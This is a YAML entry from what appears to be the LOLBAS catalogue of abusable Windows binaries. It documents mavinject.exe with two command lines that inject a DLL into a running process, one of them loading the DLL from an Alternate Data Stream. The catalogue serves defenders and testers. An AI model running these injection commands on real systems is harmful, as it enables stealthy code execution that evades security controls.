LOLBAS/yml/OSBinaries/Mavinject.yml

23 lines
851 B
YAML

---
Name: Mavinject.exe
Description: Execute, Read ADS
Author: ''
Created: '2018-05-25'
Categories: []
Commands:
- Command: MavInject.exe 3110 /INJECTRUNNING c:\folder\evil.dll
Description: Inject evil.dll into a process with PID 3110.
- Command: Mavinject.exe 4172 /INJECTRUNNING "c:\ads\file.txt:file.dll"
Description: Inject file.dll stored as an Alternate Data Stream (ADS) into a process with PID 4172.
Full Path:
- C:\Windows\System32\mavinject.exe
- C:\Windows\SysWOW64\mavinject.exe
Code Sample: []
Detection: []
Resources:
- https://twitter.com/gN3mes1s/status/941315826107510784
- https://twitter.com/Hexcorn/status/776122138063409152
- https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/
Notes: Thanks to Giuseppe N3mes1s - @gN3mes1s, Adam - @hexacorn, Oddvar Moe - @oddvarmoe